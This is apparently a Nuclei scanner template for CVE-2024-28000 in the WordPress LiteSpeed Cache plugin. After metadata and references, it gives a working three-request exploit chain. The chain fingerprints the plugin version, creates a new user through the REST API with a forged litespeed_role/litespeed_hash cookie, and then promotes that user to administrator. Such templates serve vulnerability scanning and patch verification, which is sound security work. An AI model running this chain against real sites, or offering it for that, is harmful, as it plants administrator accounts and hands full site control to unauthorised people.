id: CVE-2024-28000

info:
  name: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin
  author: melmathari
  severity: critical
  description: |
    Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
  impact: |
    Unauthenticated attackers can escalate privileges to administrator level, gaining full control of the WordPress site.
  remediation: |
    Update LiteSpeed Cache plugin to a patched version addressing CVE-2024-28000.
  reference:
    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-3-0-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
    - https://www.exploit-db.com/exploits/52328
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28000
    - https://vulncheck.com/xdb/6f169f41e032
    - https://blog.securelayer7.net/cve-2024-28000-litespeed-cache-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-28000
    cwe-id: CWE-266,NVD-CWE-Other
    epss-score: 0.92063
    epss-percentile: 0.99719
    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: litespeedtech
    product: litespeed_cache
    framework: wordpress
    publicwww-query: "/wp-content/plugins/litespeed-cache/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,litespeed-cache,priv-esc,intrusive,vkev,vuln

flow: http(1) || (http(2) && http(3))

variables:
  username: "{{to_lower(rand_text_alpha(5))}}"
  password: "{{rand_text_alphanumeric(12)}}!"
  email: "{{rand_base(8)}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'LiteSpeed Cache')
          - compare_versions(version, '<= 6.3.0.1')
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'

  - raw:
      - |
        POST /wp-json/wp/v2/users HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}

        {
          "username": "{{username}}",
          "password": "{{password}}",
          "email": "{{email}}"
        }
# The litespeed_hash input was required to escalate privileges to users
    matchers:
      - type: dsl
        dsl:
          - status_code == 201
          - contains(content_type, "application/json")
          - contains_all(body, "first_name","username")
        condition: and
        internal: true

    extractors:
      - type: json
        name: user_id
        json:
          - ".id"
        internal: true

  - raw:
      - |
        PUT /wp-json/wp/v2/users/{{user_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}

        {
          "roles": ["administrator"]
        }

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains_all(body, "administrator","registered_date")
        condition: and
# digest: 4b0a00483046022100f9f5692f16a492877eb43b958910071bd4c7fc60d827b74bcf1d55de3b835bab022100d0e7af4e10e7ed9a86d59c0806b7a0a2abdc0d25afb3defb2ab6eedeaaad2faf:922c64590222798bb761d5b6d8e72950